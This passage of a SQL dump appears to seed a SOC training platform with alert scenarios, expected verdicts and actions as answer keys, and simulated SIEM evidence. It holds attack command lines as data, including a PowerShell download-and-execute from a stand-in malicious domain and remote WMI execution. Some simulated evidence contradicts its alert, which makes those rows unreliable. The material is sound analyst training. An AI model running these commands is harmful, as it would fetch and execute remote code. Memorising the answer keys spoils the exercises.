(1755, 'False Positive: Network Scanner Misidentified as Brute Force', 'medium', 'Anomali', 'A network scanner was flagged as a brute force attack due to repetitive login attempts, but was later identified as a legitimate security scan.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.100.50\",\"dst_ip\":\"192.168.100.10\",\"username\":\"scanner\",\"hostname\":\"scanner-host\",\"request_body\":\"Failed_login_attempts: 25\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network scanner performing authorized security assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was part of a scheduled security scan, mistaken for a brute force attack.\"}', 'Advanced', 'TI', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1756, 'APT29 C2 Communication Detected via Slack', 'critical', 'Recorded Future', 'Detected communication with a known APT29 Command and Control server through Slack, indicating potential data exfiltration.', 'Data Exfil', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"104.16.59.37\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-01\",\"command_line\":\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.16.59.37\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT29 C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual Slack API usage detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of Slack as a C2 channel indicates advanced evasion techniques by APT29.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1757, 'Fileless Malware Execution via PowerShell', 'high', 'Anomali', 'Detected fileless malware execution using PowerShell on a critical server, indicative of APT41 activity.', 'Malware', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:22:13Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"\",\"username\":\"svc_backup\",\"hostname\":\"SERVER-DB01\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a common pattern for fileless malware attacks\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious.domain\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain flagged for hosting malware payloads\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41\'s use of fileless malware via PowerShell indicates sophisticated attack methods targeting critical infrastructure.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1758, 'Lazarus Group Spear-Phishing Attempt', 'critical', 'ThreatConnect', 'Received a spear-phishing email with a malicious URL, attributed to Lazarus Group, targeting executive staff.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:11:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.15\",\"username\":\"ceo@company.com\",\"hostname\":\"CEO-LAPTOP\",\"email_sender\":\"john.doe@trusted-partner.com\",\"request_body\":\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to previous phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/important.doc\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@trusted-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sender email used in spear-phishing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The use of a trusted partner\'s domain as a spoofed sender exemplifies Lazarus Group\'s sophisticated phishing techniques.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1759, 'Cozy Bear Lateral Movement Detected via WMI', 'high', 'MISP', 'Suspicious WMI activity detected between internal machines, indicating potential lateral movement by Cozy Bear.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.5\",\"dst_ip\":\"10.1.1.10\",\"username\":\"admin\",\"hostname\":\"HR-SERVER\",\"command_line\":\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP of the suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP of the lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Usage of WMI for unauthorized command execution\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Cozy Bear\'s use of WMI for lateral movement is consistent with their known TTPs for network infiltration.\"}', 'Expert', 'TI', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1760, 'Fancy Bear Brute Force Attack from Unusual Location', 'high', 'Proofpoint', 'Detected multiple failed login attempts from an IP associated with Fancy Bear, targeting the VPN portal.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:47:25Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.20\",\"username\":\"vpn_user\",\"hostname\":\"VPN-GATEWAY\",\"failed_attempts\":35}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for brute force attacks multiple times\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the VPN gateway\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"vpn_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username targeted in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack pattern and source IP align with known Fancy Bear activities targeting VPN infrastructures.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Fancy Bear Brute Force Attack from Unusual Location\",\"date\":\"2026-03-15T20:58:16.236Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1761, 'Legitimate Admin Activity Misclassified as Lateral Movement', 'medium', 'Wazuh', 'Detected internal admin activity misinterpreted as lateral movement due to unusual use of PowerShell across the network.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin_user\",\"hostname\":\"IT-SERVER\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP of the admin server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP of the admin activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern 